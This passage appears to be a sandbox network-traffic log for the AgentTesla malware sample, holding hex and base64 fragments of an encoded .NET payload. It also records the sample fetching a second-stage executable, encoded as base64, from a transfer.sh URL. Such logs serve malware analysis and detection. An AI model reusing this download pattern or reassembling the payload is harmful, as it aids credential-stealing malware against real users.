2022-03-14 16:02:10 UTC	48	IN	Data Raw: 41 43 63 42 68 30 66 61 5a 77 47 48 68 39 7a 6e 41 59 66 43 53 43 76 41 41 41 41 6e 41 59 66 43 69 44 2f 41 41 41 41 6e 41 61 41 5a 77 41 41 42 43 6f 65 47 7a 41 44 41 44 6b 41 41 41 42 64 41 41 41 52 48 78 77 6f 75 77 41 41 43 69 68 72 41 77 41 47 4b 43 51 41 41 41 6f 6f 4e 51 4d 41 42 69 68 73 41 77 41 47 4b 4c 55 41 41 41 59 4b 33 68 51 6c 4b 44 63 41 41 41 6f 4c 63 37 6f 41 41 41 6f 4b 4b 44 67 41 41 41 72 65 41 41 59 71 41 41 41 41 41 52 41 41 41 41 41 41 41 41 41 6a 49 77 41 55 47 67 41 41 41 52 73 77 41 77 42 63 41 41 41 41 58 67 41 41 45 58 4f 36 41 41 41 4b 43 67 5a 2b 4b 67 45 41 42 43 67 58 41 67 41 47 4b 45 55 44 41 41 59 6f 47 41 49 41 42 6d 2f 47 41 41 41 4b 33 67 34 6c 4b 44 63 41 41 41 6f 4d 4b 44 67 41 41 41 72 65 41 41 5a 2b 4b 67 45 41 Data Ascii: ACcBh0faZwGHh9znAYfCSCvAAAAnAYfCiD/AAAAnAaAZwAABCoeGzADADkAAABdAAARHxwouwAACihrAwAGKCQAAAooNQMABihsAwAGKLUAAAYK3hQlKDcAAAoLc7oAAAoKKDgAAAreAAYqAAAAARAAAAAAAAAjIwAUGgAAARswAwBcAAAAXgAAEXO6AAAKCgZ+KgEABCgXAgAGKEUDAAYoGAIABm/GAAAK3g4lKDcAAAoMKDgAAAreAAZ+KgEA
2022-03-14 16:02:10 UTC	64	IN	Data Raw: 67 45 73 42 52 59 4e 48 42 4d 46 41 42 45 46 48 76 34 42 4c 41 30 49 41 32 2b 64 41 41 41 4b 4c 46 30 66 43 52 4d 46 41 42 45 46 48 66 34 42 4c 41 67 52 42 41 6d 61 44 42 34 54 42 51 41 52 42 52 38 4a 2f 67 45 73 42 67 67 71 48 77 6f 54 42 51 41 52 42 52 7a 2b 41 53 77 46 4b 7a 51 64 45 77 55 41 45 51 55 59 2f 67 45 73 43 67 49 6f 72 67 45 41 43 67 6f 5a 45 77 55 41 45 51 55 57 2f 67 45 73 41 78 63 54 42 51 41 52 42 52 38 4b 2f 67 45 73 41 69 73 46 4f 46 6a 2f 2f 2f 38 4a 46 39 59 4e 43 52 45 45 6a 72 63 79 70 42 51 71 41 41 41 41 47 7a 41 45 41 44 49 41 41 41 41 76 41 41 41 52 41 69 77 47 41 6f 36 33 46 6a 4d 43 46 43 6f 6f 47 41 45 41 43 67 49 44 46 69 69 56 41 51 41 4b 62 78 6b 42 41 41 6f 4b 33 68 41 6c 4b 44 63 41 41 41 6f 4c 46 41 6f 6f 4f 41 41 41 Data Ascii: gEsBRYNHBMFABEFHv4BLA0IA2+dAAAKLF0fCRMFABEFHf4BLAgRBAmaDB4TBQARBR8J/gEsBggqHwoTBQARBRz+ASwFKzQdEwUAEQUY/gEsCgIorgEACgoZEwUAEQUW/gEsAxcTBQARBR8K/gEsAisFOFj///8JF9YNCREEjrcypBQqAAAAGzAEADIAAAAvAAARAiwGAo63FjMCFCooGAEACgIDFiiVAQAKbxkBAAoK3hAlKDcAAAoLFAooOAAA
2022-03-14 16:02:10 UTC	80	IN	Data Raw: 41 41 41 43 71 49 52 43 68 66 57 45 77 6f 52 43 68 45 65 4d 65 45 49 6a 72 63 57 4d 54 63 57 45 77 73 4a 6a 72 63 52 42 49 36 33 46 39 6f 54 48 78 4d 4d 4b 78 38 52 42 42 45 4d 43 42 45 4c 6d 69 68 71 42 41 41 47 4b 43 51 41 41 41 71 69 45 51 73 58 31 68 4d 4c 45 51 77 58 31 68 4d 4d 45 51 77 52 48 7a 48 62 63 2f 49 42 41 41 6f 54 43 52 45 45 45 79 45 57 45 79 41 34 73 67 55 41 41 42 45 68 45 53 43 61 45 78 55 52 46 52 6b 58 47 58 50 7a 41 51 41 4b 45 78 45 52 45 52 51 6f 67 51 49 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 46 6f 41 41 41 71 4d 50 77 41 41 41 52 4d 53 45 52 49 58 6a 44 38 41 41 41 45 6f 74 77 41 41 43 69 68 61 41 41 41 4b 46 39 61 4e 4b 77 41 41 41 52 4d 4f 46 68 4d 4e 46 68 4d 54 4b 43 34 43 41 41 59 54 44 78 59 54 Data Ascii: AAACqIRChfWEwoRChEeMeEIjrcWMTcWEwsJjrcRBI63F9oTHxMMKx8RBBEMCBELmihqBAAGKCQAAAqiEQsX1hMLEQwX1hMMEQwRHzHbc/IBAAoTCREEEyEWEyA4sgUAABEhESCaExURFRkXGXPzAQAKExERERQogQIABhaNBwAAARQUFCijAAAKKFoAAAqMPwAAARMSERIXjD8AAAEotwAACihaAAAKF9aNKwAAARMOFhMNFhMTKC4CAAYTDxYT
2022-03-14 16:02:10 UTC	96	IN	Data Raw: 39 70 76 38 67 41 41 43 6d 38 6d 41 67 41 4b 42 32 38 6e 41 67 41 4b 4f 57 48 2f 2f 2f 2f 65 43 67 63 73 42 67 64 76 56 77 41 41 43 74 77 71 41 41 41 41 41 52 41 41 41 41 49 41 48 41 43 6d 77 67 41 4b 41 41 41 41 41 42 4d 77 41 67 41 6f 41 41 41 41 43 41 41 41 45 52 59 4c 4b 78 73 41 42 78 66 2b 41 53 77 43 47 41 73 41 42 78 62 2b 41 53 77 43 46 77 73 41 42 78 6a 2b 41 53 77 43 4b 77 49 72 34 77 4a 37 61 41 41 41 42 43 6f 69 41 67 4e 39 61 41 41 41 42 43 6f 41 41 41 41 54 4d 41 49 41 4b 41 41 41 41 41 59 41 41 42 45 57 43 79 73 62 41 41 63 58 2f 67 45 73 41 68 67 4c 41 41 63 57 2f 67 45 73 41 68 63 4c 41 41 63 59 2f 67 45 73 41 69 73 43 4b 2b 4d 43 65 32 6b 41 41 41 51 71 49 67 49 44 66 57 6b 41 41 41 51 71 41 41 41 41 45 7a 41 43 41 43 67 41 41 41 41 47 Data Ascii: 9pv8gAACm8mAgAKB28nAgAKOWH////eCgcsBgdvVwAACtwqAAAAARAAAAIAHACmwgAKAAAAABMwAgAoAAAACAAAERYLKxsABxf+ASwCGAsABxb+ASwCFwsABxj+ASwCKwIr4wJ7aAAABCoiAgN9aAAABCoAAAATMAIAKAAAAAYAABEWCysbAAcX/gEsAhgLAAcW/gEsAhcLAAcY/gEsAisCK+MCe2kAAAQqIgIDfWkAAAQqAAAAEzACACgAAAAG
2022-03-14 16:02:10 UTC	112	IN	Data Raw: 41 6f 58 6a 56 38 41 41 41 45 54 42 78 45 48 46 68 38 73 6e 52 45 48 62 30 77 42 41 41 6f 4b 46 67 61 4f 74 78 66 61 45 77 67 54 42 44 69 71 41 51 41 41 42 68 45 45 42 68 45 45 6d 69 69 63 41 41 41 4b 4b 46 45 43 41 41 71 69 42 68 45 45 6d 68 51 6f 79 77 51 41 42 68 65 4e 42 77 41 41 41 52 4d 4a 45 51 6b 57 4b 4d 77 45 41 41 61 69 45 51 6b 55 46 42 51 6f 6f 77 41 41 43 68 65 4d 4c 77 41 41 41 52 59 6f 39 41 45 41 43 69 78 57 42 68 45 45 42 68 45 45 6d 68 51 6f 76 67 4d 41 42 68 69 4e 42 77 41 41 41 52 4d 4b 45 51 6f 57 46 6f 77 2f 41 41 41 42 6f 68 45 4b 46 77 59 52 42 4a 6f 55 4b 49 45 43 41 41 59 57 6a 51 63 41 41 41 45 55 46 42 51 6f 6f 77 41 41 43 68 65 4d 50 77 41 41 41 53 69 33 41 41 41 4b 6f 68 45 4b 46 42 51 55 4b 4b 4d 41 41 41 6f 6f 45 51 41 41 Data Ascii: AoXjV8AAAETBxEHFh8snREHb0wBAAoKFgaOtxfaEwgTBDiqAQAABhEEBhEEmiicAAAKKFECAAqiBhEEmhQoywQABheNBwAAARMJEQkWKMwEAAaiEQkUFBQoowAACheMLwAAARYo9AEACixWBhEEBhEEmhQovgMABhiNBwAAARMKEQoWFow/AAABohEKFwYRBJoUKIECAAYWjQcAAAEUFBQoowAACheMPwAAASi3AAAKohEKFBQUKKMAAAooEQAA
2022-03-14 16:02:10 UTC	128	IN	Data Raw: 41 73 44 65 79 55 42 41 41 51 73 32 42 6f 54 42 67 41 52 42 68 38 4f 2f 67 45 73 46 77 4a 37 44 67 45 41 42 41 6b 6f 6d 51 49 41 43 68 59 59 62 36 6b 41 41 41 6f 66 44 78 4d 47 41 42 45 47 48 77 76 2b 41 53 77 4b 49 41 41 49 41 41 41 4e 48 77 77 54 42 67 41 52 42 68 33 2b 41 53 77 51 42 77 4e 37 47 67 45 41 42 47 2b 59 41 41 41 4b 43 68 34 54 42 67 41 52 42 68 38 54 2f 67 45 73 47 67 4a 37 44 67 45 41 42 41 69 4f 74 37 59 6f 6d 51 49 41 43 68 59 59 62 36 6b 41 41 41 6f 66 46 42 4d 47 41 42 45 47 47 50 34 42 4c 42 41 43 65 77 34 42 41 41 52 76 68 67 49 41 43 68 4d 45 47 52 4d 47 41 42 45 47 48 78 62 2b 41 53 77 5a 41 77 4a 37 44 67 45 41 42 47 2b 47 41 67 41 4b 45 51 54 61 75 48 30 66 41 51 41 45 48 78 63 54 42 67 41 52 42 68 38 52 2f 67 45 73 47 51 4a 37 Data Ascii: AsDeyUBAAQs2BoTBgARBh8O/gEsFwJ7DgEABAkomQIAChYYb6kAAAofDxMGABEGHwv+ASwKIAAIAAANHwwTBgARBh3+ASwQBwN7GgEABG+YAAAKCh4TBgARBh8T/gEsGgJ7DgEABAiOt7YomQIAChYYb6kAAAofFBMGABEGGP4BLBACew4BAARvhgIAChMEGRMGABEGHxb+ASwZAwJ7DgEABG+GAgAKEQTauH0fAQAEHxcTBgARBh8R/gEsGQJ7
2022-03-14 16:02:10 UTC	144	IN	Data Raw: 52 6a 57 32 68 4d 45 48 79 49 54 43 77 41 52 43 78 38 56 2f 67 45 73 43 51 69 4f 74 78 4d 45 48 78 59 54 43 77 41 52 43 78 38 74 2f 67 45 73 45 77 4d 4a 46 39 61 52 46 39 6f 58 31 6f 30 72 41 41 41 42 44 42 38 75 45 77 73 41 45 51 73 63 2f 67 45 73 43 41 4d 4a 6b 52 4d 4b 48 52 4d 4c 41 42 45 4c 48 78 66 2b 41 53 77 57 42 32 2f 38 41 51 41 47 41 67 68 76 39 77 45 41 42 6d 2f 53 41 67 41 4b 48 78 67 54 43 77 41 52 43 78 38 6b 2f 67 45 73 45 51 4d 4a 47 4e 59 49 46 68 45 45 4b 42 63 42 41 41 6f 66 4a 52 4d 4c 41 42 45 4c 48 77 7a 2b 41 53 77 4a 4f 41 76 2b 2f 2f 38 66 44 52 4d 4c 41 42 45 4c 48 79 4c 2b 41 53 77 47 4b 39 49 66 49 78 4d 4c 41 42 45 4c 48 7a 33 2b 41 53 77 4e 41 34 36 33 43 52 6a 57 32 68 4d 45 48 7a 34 54 43 77 41 52 43 78 38 79 2f 67 45 73 Data Ascii: RjW2hMEHyITCwARCx8V/gEsCQiOtxMEHxYTCwARCx8t/gEsEwMJF9aRF9oX1o0rAAABDB8uEwsAEQsc/gEsCAMJkRMKHRMLABELHxf+ASwWB2/8AQAGAghv9wEABm/SAgAKHxgTCwARCx8k/gEsEQMJGNYIFhEEKBcBAAofJRMLABELHwz+ASwJOAv+//8fDRMLABELHyL+ASwGK9IfIxMLABELHz3+ASwNA463CRjW2hMEHz4TCwARCx8y/gEs
2022-03-14 16:02:10 UTC	160	IN	Data Raw: 41 63 57 2f 67 45 73 41 68 63 4c 41 41 63 61 2f 67 45 73 41 69 73 43 4b 37 63 47 4b 6c 4a 2b 6d 51 45 41 42 42 61 61 4a 53 30 4a 4a 68 59 57 46 69 67 74 41 67 41 47 4b 6c 4a 2b 6d 51 45 41 42 42 65 61 4a 53 30 4a 4a 68 63 57 47 43 67 74 41 67 41 47 4b 6c 5a 2b 6d 51 45 41 42 42 69 61 4a 53 30 4b 4a 68 67 59 48 78 4d 6f 4c 51 49 41 42 69 70 61 66 70 6b 42 41 41 51 5a 6d 69 55 74 43 79 59 5a 48 78 55 66 45 79 67 74 41 67 41 47 4b 6c 5a 2b 6d 51 45 41 42 42 71 61 4a 53 30 4b 4a 68 6f 66 4b 42 6f 6f 4c 51 49 41 42 69 70 57 66 70 6b 42 41 41 51 62 6d 69 55 74 43 69 59 62 48 79 77 61 4b 43 30 43 41 41 59 71 57 6e 36 5a 41 51 41 45 48 4a 6f 6c 4c 51 73 6d 48 42 38 77 48 77 77 6f 4c 51 49 41 42 69 70 61 66 70 6b 42 41 41 51 64 6d 69 55 74 43 79 59 64 48 7a 77 66 Data Ascii: AcW/gEsAhcLAAca/gEsAisCK7cGKlJ+mQEABBaaJS0JJhYWFigtAgAGKlJ+mQEABBeaJS0JJhcWGCgtAgAGKlZ+mQEABBiaJS0KJhgYHxMoLQIABipafpkBAAQZmiUtCyYZHxUfEygtAgAGKlZ+mQEABBqaJS0KJhofKBooLQIABipWfpkBAAQbmiUtCiYbHywaKC0CAAYqWn6ZAQAEHJolLQsmHB8wHwwoLQIABipafpkBAAQdmiUtCyYdHzwf
2022-03-14 16:02:10 UTC	176	IN	Data Raw: 68 63 41 41 42 38 62 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 59 42 41 41 43 61 4a 53 30 53 4a 69 43 47 41 51 41 41 49 47 45 58 41 41 41 66 4a 43 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 43 48 41 51 41 41 6d 69 55 74 45 69 59 67 68 77 45 41 41 43 43 46 46 77 41 41 48 78 6f 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 69 41 45 41 41 4a 6f 6c 4c 52 49 6d 49 49 67 42 41 41 41 67 6e 78 63 41 41 42 38 4b 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 6b 42 41 41 43 61 4a 53 30 53 4a 69 43 4a 41 51 41 41 49 4b 6b 58 41 41 41 66 43 79 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 4b 41 51 41 41 6d 69 55 74 45 53 59 67 69 67 45 41 41 43 43 30 46 77 41 41 48 53 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 4c 41 51 41 41 Data Ascii: hcAAB8bKC0CAAYqhn6ZAQAEIIYBAACaJS0SJiCGAQAAIGEXAAAfJCgtAgAGKoZ+mQEABCCHAQAAmiUtEiYghwEAACCFFwAAHxooLQIABiqGfpkBAAQgiAEAAJolLRImIIgBAAAgnxcAAB8KKC0CAAYqhn6ZAQAEIIkBAACaJS0SJiCJAQAAIKkXAAAfCygtAgAGKoJ+mQEABCCKAQAAmiUtESYgigEAACC0FwAAHSgtAgAGKoJ+mQEABCCLAQAA
2022-03-14 16:02:10 UTC	192	IN	Data Raw: 41 59 71 68 6e 36 5a 41 51 41 45 49 50 51 43 41 41 43 61 4a 53 30 53 4a 69 44 30 41 67 41 41 49 49 30 73 41 41 41 66 43 69 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 44 31 41 67 41 41 6d 69 55 74 45 53 59 67 39 51 49 41 41 43 43 58 4c 41 41 41 47 53 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 44 32 41 67 41 41 6d 69 55 74 45 53 59 67 39 67 49 41 41 43 43 61 4c 41 41 41 47 69 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 44 33 41 67 41 41 6d 69 55 74 45 69 59 67 39 77 49 41 41 43 43 65 4c 41 41 41 48 78 41 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 2b 41 49 41 41 4a 6f 6c 4c 52 49 6d 49 50 67 43 41 41 41 67 72 69 77 41 41 42 38 57 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 50 6b 43 41 41 43 61 4a 53 30 52 4a 69 44 35 41 67 41 41 Data Ascii: AYqhn6ZAQAEIPQCAACaJS0SJiD0AgAAII0sAAAfCigtAgAGKoJ+mQEABCD1AgAAmiUtESYg9QIAACCXLAAAGSgtAgAGKoJ+mQEABCD2AgAAmiUtESYg9gIAACCaLAAAGigtAgAGKoZ+mQEABCD3AgAAmiUtEiYg9wIAACCeLAAAHxAoLQIABiqGfpkBAAQg+AIAAJolLRImIPgCAAAgriwAAB8WKC0CAAYqgn6ZAQAEIPkCAACaJS0RJiD5AgAA
2022-03-14 16:02:10 UTC	208	IN	Data Raw: 75 62 57 68 59 57 4f 67 49 6d 61 6e 6f 79 57 69 6f 2b 50 72 37 65 68 69 35 75 5a 6c 4a 79 61 73 70 32 65 73 35 65 55 67 35 4f 45 68 38 79 73 2b 61 71 76 2f 4b 79 76 34 50 50 31 38 66 6e 72 38 36 47 6e 34 76 62 68 37 2b 6d 2b 38 65 75 78 35 4f 65 7a 34 4c 4c 6b 37 42 4e 4b 53 58 35 48 51 57 46 4b 54 31 64 54 47 32 39 4a 56 31 46 62 56 56 74 63 54 58 42 61 61 6c 74 64 41 77 4e 70 64 56 56 47 62 30 6c 6e 61 48 78 72 58 32 68 77 61 6d 46 74 53 48 4a 70 5a 33 39 70 4b 58 67 71 65 33 38 70 63 79 73 39 4a 53 4d 6c 4a 7a 68 65 57 51 6c 52 51 77 31 59 57 31 4e 4f 55 41 64 53 56 56 56 56 47 42 6c 4f 54 6b 35 48 42 45 39 43 51 30 42 48 52 30 4a 43 52 41 67 75 4f 69 49 72 49 79 6b 35 59 67 63 43 63 58 5a 33 64 48 56 71 61 32 70 35 62 33 46 6b 61 48 4a 37 47 44 41 6c Data Ascii: ubWhYWOgImanoyWio+Pr7ehi5uZlJyasp2es5eUg5OEh8ys+aqv/Kyv4PP18fnr86Gn4vbh7+m+8eux5Oez4LLk7BNKSX5HQWFKT1dTG29JV1FbVVtcTXBaaltdAwNpdVVGb0lnaHxrX2hwamFtSHJpZ39pKXgqe38pcys9JSMlJzheWQlRQw1YW1NOUAdSVVVVGBlOTk5HBE9CQ0BHR0JCRAguOiIrIyk5YgcCcXZ3dHVqa2p5b3FkaHJ7GDAl
2022-03-14 16:02:10 UTC	224	IN	Data Raw: 41 59 49 54 43 2b 59 41 32 55 41 76 48 6f 42 41 41 41 41 42 67 67 72 4a 4e 4d 68 5a 51 44 77 65 67 45 41 41 41 41 47 43 44 73 6b 32 53 46 6c 41 50 78 36 41 51 41 41 41 41 59 59 46 53 58 6e 49 57 55 41 4a 48 73 42 41 41 41 41 42 68 67 56 4a 65 34 68 5a 67 42 51 65 77 45 41 41 41 41 47 47 42 55 6c 47 79 4a 6e 41 42 78 38 41 51 41 41 41 41 45 41 6c 77 45 59 44 32 67 41 70 48 77 42 41 41 41 41 41 51 43 58 41 62 41 4e 61 41 43 77 66 77 45 41 41 41 41 52 41 4a 63 42 6d 79 4a 6f 41 4e 53 44 41 51 41 41 41 42 45 41 6c 77 48 53 49 6d 34 41 49 49 59 42 41 41 41 41 45 51 43 58 41 64 34 69 63 41 42 6b 68 67 45 41 41 41 41 52 41 4a 63 42 35 69 4a 77 41 4b 43 47 41 51 41 41 41 42 45 41 6c 77 45 59 49 33 45 41 31 6f 59 42 41 41 41 41 42 67 44 33 42 68 4d 41 63 51 44 30 Data Ascii: AYITC+YA2UAvHoBAAAABggrJNMhZQDwegEAAAAGCDsk2SFlAPx6AQAAAAYYFSXnIWUAJHsBAAAABhgVJe4hZgBQewEAAAAGGBUlGyJnABx8AQAAAAEAlwEYD2gApHwBAAAAAQCXAbANaACwfwEAAAARAJcBmyJoANSDAQAAABEAlwHSIm4AIIYBAAAAEQCXAd4icABkhgEAAAARAJcB5iJwAKCGAQAAABEAlwEYI3EA1oYBAAAABgD3BhMAcQD0
2022-03-14 16:02:10 UTC	240	IN	Data Raw: 67 49 41 41 41 43 57 41 4e 30 43 35 67 4a 39 41 45 39 61 41 67 41 41 41 4a 59 41 65 52 54 6d 41 6e 30 41 63 46 6f 43 41 41 41 41 6c 67 41 48 41 2b 59 43 66 51 43 53 57 67 49 41 41 41 43 57 41 4e 30 56 35 67 4a 39 41 4c 52 61 41 67 41 41 41 4a 59 41 4d 51 50 6d 41 6e 30 41 31 6c 6f 43 41 41 41 41 6c 67 44 67 46 75 59 43 66 51 44 33 57 67 49 41 41 41 43 57 41 47 55 44 35 67 4a 39 41 42 6c 62 41 67 41 41 41 4a 59 41 48 52 66 6d 41 6e 30 41 4f 31 73 43 41 41 41 41 6c 67 43 50 41 2b 59 43 66 51 42 64 57 77 49 41 41 41 43 57 41 45 63 58 35 67 4a 39 41 48 35 62 41 67 41 41 41 4a 59 41 75 51 50 6d 41 6e 30 41 6e 31 73 43 41 41 41 41 6c 67 44 48 46 2b 59 43 66 51 44 41 57 77 49 41 41 41 43 57 41 41 4d 45 35 67 4a 39 41 4f 46 62 41 67 41 41 41 4a 59 41 79 42 6e 6d Data Ascii: gIAAACWAN0C5gJ9AE9aAgAAAJYAeRTmAn0AcFoCAAAAlgAHA+YCfQCSWgIAAACWAN0V5gJ9ALRaAgAAAJYAMQPmAn0A1loCAAAAlgDgFuYCfQD3WgIAAACWAGUD5gJ9ABlbAgAAAJYAHRfmAn0AO1sCAAAAlgCPA+YCfQBdWwIAAACWAEcX5gJ9AH5bAgAAAJYAuQPmAn0An1sCAAAAlgDHF+YCfQDAWwIAAACWAAME5gJ9AOFbAgAAAJYAyBnm
2022-03-14 16:02:10 UTC	256	IN	Data Raw: 33 52 4e 62 32 52 70 5a 6d 6c 6c 5a 41 42 7a 5a 58 52 66 54 47 46 7a 64 45 31 76 5a 47 6c 6d 61 57 56 6b 41 48 4e 6c 64 46 39 46 62 6d 46 69 62 47 56 6b 41 47 64 6c 64 46 39 6c 62 6d 46 69 62 47 56 6b 41 48 4e 6c 64 46 39 6c 62 6d 46 69 62 47 56 6b 41 47 64 6c 64 46 39 43 65 58 52 6c 63 31 52 79 59 57 35 7a 5a 6d 56 79 63 6d 56 6b 41 47 46 6b 5a 46 39 46 62 47 46 77 63 32 56 6b 41 45 6c 7a 51 6e 6c 77 59 58 4e 7a 5a 57 51 41 5a 32 56 30 58 30 78 68 63 33 52 42 59 32 4e 6c 63 33 4e 6c 5a 41 42 7a 5a 58 52 66 54 47 46 7a 64 45 46 6a 59 32 56 7a 63 32 56 6b 41 47 64 6c 64 46 39 44 62 32 35 75 5a 57 4e 30 5a 57 51 41 59 57 52 6b 58 30 4e 76 62 58 42 73 5a 58 52 6c 5a 41 42 54 65 58 4e 30 5a 57 30 75 51 32 39 73 62 47 56 6a 64 47 6c 76 62 6e 4d 75 55 33 42 6c Data Ascii: 3RNb2RpZmllZABzZXRfTGFzdE1vZGlmaWVkAHNldF9FbmFibGVkAGdldF9lbmFibGVkAHNldF9lbmFibGVkAGdldF9CeXRlc1RyYW5zZmVycmVkAGFkZF9FbGFwc2VkAElzQnlwYXNzZWQAZ2V0X0xhc3RBY2Nlc3NlZABzZXRfTGFzdEFjY2Vzc2VkAGdldF9Db25uZWN0ZWQAYWRkX0NvbXBsZXRlZABTeXN0ZW0uQ29sbGVjdGlvbnMuU3Bl
2022-03-14 16:02:10 UTC	272	IN	Data Raw: 51 51 41 41 42 4a 35 42 41 41 42 44 67 34 46 41 41 49 4f 44 67 34 44 41 41 41 4f 42 67 41 44 44 67 34 4f 44 67 55 67 41 67 45 63 47 41 59 67 41 51 45 53 67 49 55 45 49 41 45 42 44 51 59 41 41 77 67 4f 44 67 49 45 41 41 45 43 44 67 59 41 41 52 4b 41 6b 51 34 46 41 41 41 64 45 6d 55 46 49 41 41 53 67 4a 30 46 41 41 45 42 45 6d 6b 45 41 41 45 42 44 67 59 41 41 77 45 4f 44 67 49 48 41 41 49 42 44 68 47 41 70 51 4d 47 45 6d 30 47 49 41 49 53 62 51 34 43 42 53 41 43 41 51 34 63 42 41 41 42 43 41 34 47 42 77 4d 63 44 52 45 6b 42 41 41 42 44 67 6b 46 41 41 41 53 67 4d 45 46 49 41 41 53 67 4d 55 45 41 41 45 4e 44 67 4d 41 41 42 77 51 42 77 59 4f 45 6f 44 4e 45 6f 44 52 45 6f 44 56 45 6f 44 5a 44 67 59 41 41 52 4b 41 33 51 34 46 41 41 41 53 67 4f 55 47 49 41 45 42 Data Ascii: QQAABJ5BAABDg4FAAIODg4DAAAOBgADDg4ODgUgAgEcGAYgAQESgIUEIAEBDQYAAwgODgIEAAECDgYAARKAkQ4FAAAdEmUFIAASgJ0FAAEBEmkEAAEBDgYAAwEODgIHAAIBDhGApQMGEm0GIAISbQ4CBSACAQ4cBAABCA4GBwMcDREkBAABDgkFAAASgMEFIAASgMUEAAENDgMAABwQBwYOEoDNEoDREoDVEoDZDgYAARKA3Q4FAAASgOUGIAEB
2022-03-14 16:02:10 UTC	288	IN	Data Raw: 32 4e 6f 5a 57 31 68 63 79 31 74 61 57 4e 79 62 33 4e 76 5a 6e 51 74 59 32 39 74 4f 6d 46 7a 62 53 35 32 4d 69 49 2b 44 51 6f 67 49 43 41 67 50 48 4e 6c 59 33 56 79 61 58 52 35 50 67 30 4b 49 43 41 67 49 43 41 67 50 48 4a 6c 63 58 56 6c 63 33 52 6c 5a 46 42 79 61 58 5a 70 62 47 56 6e 5a 58 4d 67 65 47 31 73 62 6e 4d 39 49 6e 56 79 62 6a 70 7a 59 32 68 6c 62 57 46 7a 4c 57 31 70 59 33 4a 76 63 32 39 6d 64 43 31 6a 62 32 30 36 59 58 4e 74 4c 6e 59 7a 49 6a 34 4e 43 69 41 67 49 43 41 67 49 43 41 67 50 48 4a 6c 63 58 56 6c 63 33 52 6c 5a 45 56 34 5a 57 4e 31 64 47 6c 76 62 6b 78 6c 64 6d 56 73 49 47 78 6c 64 6d 56 73 50 53 4a 68 63 30 6c 75 64 6d 39 72 5a 58 49 69 49 48 56 70 51 57 4e 6a 5a 58 4e 7a 50 53 4a 6d 59 57 78 7a 5a 53 49 76 50 67 30 4b 49 43 41 67 Data Ascii: 2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MiI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAgPHJlcXVlc3RlZFByaXZpbGVnZXMgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSIvPg0KICAg

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49770	144.76.136.153	443	C:\Users\user\Desktop\AgentTesla.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-14 16:02:11 UTC	289	OUT	GET /get/iGs052/BASE64.txt HTTP/1.1 Host: transfer.sh
2022-03-14 16:02:12 UTC	289	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Mon, 14 Mar 2022 16:02:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 62124 Connection: close Content-Disposition: attachment; filename="BASE64.txt" Retry-After: Mon, 14 Mar 2022 17:02:14 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,102.129.143.93,102.129.143.93 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 8 X-Ratelimit-Reset: 1647273734 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2022-03-14 16:02:12 UTC	289	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 2b 67 74 66 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 4b 34 41 41 41 41 47 41 41 41 41 41 41 41 41 4c 73 30 41 41 41 41 67 41 41 41 41 34 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK+gtfEAAAAAAAAAAOAADiELAVAAAK4AAAAGAAAAAAAALs0AAAAgAAAA4AAAAABAAAAgAAAAAgA
